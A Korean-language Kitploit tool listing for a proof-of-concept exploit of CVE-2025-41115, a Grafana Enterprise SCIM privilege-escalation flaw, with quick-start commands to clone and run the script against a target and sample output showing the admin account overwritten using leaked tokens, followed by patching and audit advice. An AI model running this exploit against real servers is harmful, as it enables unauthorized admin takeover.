Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Blackash-CVE-2025-41115 — CVE-2025-41115 | Kitploit
도구/GitHubGitHub/rockmelodies/blackash-cve-2025-41115
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCloud SecurityIdentity & Access Management (IAM)Authentication
GitHubrockmelodies/blackash-cve-2025-41115

Blackash-CVE-2025-41115

CVE-2025-41115

저장소 보기
19개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🔐 CVE-2025-41115: Grafana SCIM 권한 상승 치명적 취약점

218fa54275e0e31c37b4e5091d9112ba_M

Grafana Enterprise의 치명적인 SCIM 권한 상승 취약점


🌟 요약

CVE-2025-41115는 SCIM 사용자 프로비저닝 기능에 영향을 미치는 Grafana Enterprise의 치명적(CVSS 10.0) 취약점입니다.

SCIM 프로비저닝이 활성화되고 user_sync_enabled = true인 경우, 악의적인 SCIM 클라이언트가 숫자 형식의 externalId 를 보낼 수 있으며, Grafana는 이를 내부 사용자 ID로 잘못 매핑하여 공격자가 관리자를 포함한 기존 계정을 가장하거나 덮어쓸 수 있게 됩니다. ⚠️ Grafana OSS는 영향을 받지 않습니다.


🚨 영향

  • 🔓 계정 탈취 (관리자 계정 포함)
  • 🚀 전체 관리자 권한을 통한 권한 상승
  • 🗄️ 대시보드 / 데이터 / 조직 구성에 대한 접근
  • 🌐 낮은 요구 조건으로 네트워크를 통한 악용 가능
  • 🛑 멀티 테넌트 또는 엔터프라이즈 SSO 환경에서 고위험

악용에 필요한 조건:

  1. enableSCIM = true
  2. [auth.scim] user_sync_enabled = true

🧩 영향을 받는 버전

버전상태
12.0.0 → 12.2.1❌ 취약
12.3.0✅ 패치됨
12.2.1 (패치 빌드)✅ 패치됨
12.1.3✅ 패치됨
12.0.6✅ 패치됨

💡 관리형 Grafana 서비스(AWS/Azure/Grafana Cloud) 는 공급업체에 의해 패치되었습니다.


3초 만에 사용하는 방법:

1. 다운로드

root@kitploit:~
sudo git clone https://github.com/B1ack4sh/Blackash-CVE-2025-41115.git

또는 위 스크립트를 파일에 복사하여 붙여넣기만 하면 됩니다

2. 실행 가능하게 만들기 (선택 사항)

root@kitploit:~
chmod +x CVE-2025-41115.py

3. 실행

root@kitploit:~
python3 CVE-2025-41115.py http://10.10.13.37:3000
# or
python3 CVE-2025-41115.py https://grafana.company.com

익스플로잇이 실제로 작동하면(즉, 대상이 취약하고 토큰이 유효한 경우) 정확히 다음과 같은 출력이 표시됩니다: text

root@kitploit:~
[*] CVE-2025-41115 → Targeting http://10.10.13.37:3000
[*] Trying default/leaked tokens + your token...
[+] PWNED with token → glsa_XxXxXxXxXxXxXxXxXxXx...
[+] Login as: [email protected] (any password) → you are now Admin!
[+] Full response: {
  "schemas": [
    "urn:ietf:params:scim:schemas:core:2.0:User"
  ],
  "id": "1",                     ←←← THIS IS THE KEY LINE (UID 1 overwritten)
  "externalId": "1",
  "meta": { ... },
  "userName": "[email protected]",
  "name": {
    "formatted": "Pwned User"
  },
  "emails": [
    {
      "value": "[email protected]",
      "primary": true
    }
  ],
  "active": true
}

🔧 완화 조치

🥇 1. 즉시 업그레이드하세요

12.3.0 또는 패치된 유지보수 릴리스 중 하나로 업데이트하세요.

🛠️ 2. SCIM 구성을 확인하세요

SCIM 프로비저닝을 사용하지 않는 경우 다음이 설정되어 있는지 확인하세요:

root@kitploit:~
enableSCIM = false

또는

root@kitploit:~
[auth.scim]
user_sync_enabled = false

📜 3. 감사 로그

다음을 찾아보세요:

  • 예상치 못한 새 사용자
  • 숫자 형식 externalId 사용
  • 권한 변경

🔐 4. 신뢰 경계

신뢰할 수 있는 ID 공급자만 SCIM 엔드포인트와 통신할 수 있도록 하세요.

👀 5. 악용 모니터링

의심스러운 로그인, 사용자 생성 이벤트, 관리자 계정 탈취를 주시하세요.


📅 타임라인

  • 📌 2025-11-04 — 내부적으로 문제 발견
  • 📌 2025-11-04 — 인시던트 선언
  • 📌 2025-11-05 — 클라우드 공급업체에 비공개 통지 및 패치
  • 📌 2025-11-19 — 공개 공개 및 공식 수정 릴리스

📝 추가 참고 사항

  • 🎯 이 결함은 Grafana가 숫자 형식의 externalId → 내부 uid 로 매핑하기 때문에 발생합니다.
  • 🟢 악용에는 사용자 동기화가 포함된 SCIM이 필요하므로 많은 배포 환경이 기본적으로 안전합니다 — 하지만 반드시 확인해야 합니다.
  • ⚡ 공개 시점에는 실제 현장 악용이 확인되지 않았지만, CVSS 10점은 극도로 위험함을 의미합니다.

면책 조항!!!

이 PoC는 귀하가 소유했거나 명시적인 서면 허가를 받은 시스템에서만 승인된 보안 테스트 및 교육 목적으로 사용해야 합니다. 무단 사용은 불법이며 형사 기소로 이어질 수 있습니다. 작성자와 배포자는 오용에 대한 책임을 지지 않습니다. 즉시 패치하십시오 (≥12.0.6 / 12.3.0+).

도구 다운로드